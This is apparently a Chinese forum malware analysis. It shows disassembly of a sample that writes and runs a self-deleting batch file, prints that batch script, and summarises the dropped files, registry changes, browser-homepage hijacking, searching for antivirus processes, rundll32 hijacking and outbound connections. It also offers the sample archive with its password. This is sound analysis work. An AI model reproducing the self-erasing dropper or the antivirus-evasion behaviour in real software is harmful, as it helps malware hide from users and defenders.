\lstrcpyA 00404110 |. 8B35 3C504000 MOV ESI,DWORD PTR DS:[<&KERNEL32.lstrcat>; kernel32.lstrcatA 00404116 |. 6A 0A PUSH 0A 00404118 |. 5F POP EDI 00404119 |> 8D85 ECF6FFFF /LEA EAX,DWORD PTR SS:[EBP-914] 0040411F |. 68 ACE24300 |PUSH 复件_123.0043E2AC ; ASCII "@echo 375O540>>575.aqq" 00404124 |. 50 |PUSH EAX 00404125 |. FFD6 |CALL ESI 00404127 |. 4F |DEC EDI 00404128 |.^ 75 EF \JNZ SHORT 复件_123.00404119 0040412A |. 8D85 ECF6FFFF LEA EAX,DWORD PTR SS:[EBP-914] 00404130 |. 68 9CE24300 PUSH 复件_123.0043E29C ; ASCII "@del 575.aqq" 00404135 |. 50 PUSH EAX 00404136 |. FFD6 CALL ESI 00404138 |. 8D85 ECF6FFFF LEA EAX,DWORD PTR SS:[EBP-914] 0040413E |. 68 94E24300 PUSH 复件_123.0043E294 ; ASCII "@del "" 00404143 |. 50 PUSH EAX 00404144 |. FFD6 CALL ESI 00404146 |. 8D85 ECFEFFFF LEA EAX,DWORD PTR SS:[EBP-114] 0040414C |. 50 PUSH EAX 0040414D |. 8D85 ECF6FFFF LEA EAX,DWORD PTR SS:[EBP-914] 00404153 |. 50 PUSH EAX 00404154 |. FFD6 CALL ESI 00404156 |. 8D85 ECF6FFFF LEA EAX,DWORD PTR SS:[EBP-914] 0040415C |. 68 90E24300 PUSH 复件_123.0043E290 ; ASCII """ 00404161 |. 50 PUSH EAX 00404162 |. FFD6 CALL ESI 00404164 |. 8D85 ECF6FFFF LEA EAX,DWORD PTR SS:[EBP-914] 0040416A |. 68 88E24300 PUSH 复件_123.0043E288 ; ASCII "@del " 0040416F |. 50 PUSH EAX 00404170 |. FFD6 CALL ESI 00404172 |. 8D45 F4 LEA EAX,DWORD PTR SS:[EBP-C] 00404175 |. 50 PUSH EAX 00404176 |. 8D85 ECF6FFFF LEA EAX,DWORD PTR SS:[EBP-914] 0040417C |. 50 PUSH EAX 0040417D |. FFD6 CALL ESI 0040417F |. 8D85 ECF6FFFF LEA EAX,DWORD PTR SS:[EBP-914] 00404185 |. 68 80E24300 PUSH 复件_123.0043E280 ; ASCII "@exit" 0040418A |. 50 PUSH EAX 0040418B |. FFD6 CALL ESI 0040418D |. 53 PUSH EBX ; /hTemplateFile 0040418E |. 53 PUSH EBX ; |Attributes 0040418F |. 6A 02 PUSH 2 ; |Mode = CREATE_ALWAYS 00404191 |. 53 PUSH EBX ; |pSecurity 00404192 |. 53 PUSH EBX ; |ShareMode 00404193 |. 8D45 F4 LEA EAX,DWORD PTR SS:[EBP-C] ; | 00404196 |. 68 00000040 PUSH 40000000 ; |Access = GENERIC_WRITE 0040419B |. 50 PUSH EAX ; |FileName 0040419C |. FF15 5C504000 CALL DWORD PTR DS:[<&KERNEL32.CreateFile>; \CreateFileA 004041A2 |. 8BF0 MOV ESI,EAX 004041A4 |. 8D45 F0 LEA EAX,DWORD PTR SS:[EBP-10] 004041A7 |. 53 PUSH EBX ; /pOverlapped 004041A8 |. 50 PUSH EAX ; |pBytesWritten 004041A9 |. 8D85 ECF6FFFF LEA EAX,DWORD PTR SS:[EBP-914] ; | 004041AF |. 68 00080000 PUSH 800 ; |nBytesToWrite = 800 (2048.) 004041B4 |. 50 PUSH EAX ; |Buffer 004041B5 |. 56 PUSH ESI ; |hFile 004041B6 |. FF15 68504000 CALL DWORD PTR DS:[<&KERNEL32.WriteFile>>; \WriteFile 004041BC |. 56 PUSH ESI ; /hObject 004041BD |. FF15 60504000 CALL DWORD PTR DS:[<&KERNEL32.CloseHandl>; \CloseHandle 004041C3 |. 8D45 F4 LEA EAX,DWORD PTR SS:[EBP-C] 004041C6 |. 53 PUSH EBX ; /ShowState 004041C7 |. 50 PUSH EAX ; |CmdLine 004041C8 |. FF15 58504000 CALL DWORD PTR DS:[<&KERNEL32.WinExec>] ; \WinExec 004041CE |. 53 PUSH EBX ; /ExitCode 004041CF \. FF15 38504000 CALL DWORD PTR DS:[<&KERNEL32.ExitProces>; \ExitProcess
代码:
@echo off @echo 375O540>>575.aqq @echo 375O540>>575.aqq @echo 375O540>>575.aqq @echo 375O540>>575.aqq @echo 375O540>>575.aqq @echo 375O540>>575.aqq @echo 375O540>>575.aqq @echo 375O540>>575.aqq @echo 375O540>>575.aqq @echo 375O540>>575.aqq @del 575.aqq @del "C:\Documents and Settings\Robey\桌面\新建文件夹\复件 123.exe" @del 375O540.bat @exit
总结:
1、病毒创建文件
此病毒为变形病毒,每次运行后释放的dll文件会有所不同。但释放的病毒体是一个名字。
%SystemRoot%\system32\zrrs1.dll <-------|
%SystemRoot%\system32\dllcache\zrrs1.dll <-------|----->每次运行后这三个文件的文件名是不同的。
%SystemRoot%\system32\iksii.dll(报毒Dll) <-------|
%SystemRoot%\system32\xxggyu.exe(释放的病毒体)
D:\ssshall(属性为只读,隐藏,系统文件)
2、病毒修改注册表信息
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}
HKEY_LOCAL_MACHINE\SOFTWARE\Softfy
3、病毒分析
桌面上添加了一个IE图标,网址指向http://www.wz157.cn,创建注册文件,锁定IE从自身释放文件到系统目录下。并设置文件的属性为只读、隐藏、系统文件。遍历进程,查找360tray.exe、ravmond.exe(瑞星),劫持rundll32.exe进程,并不断的向外请求连接。最后从自身释放批处理文件,然后将自身删除。
病毒样本.rar[解压密码是:kill_virus ]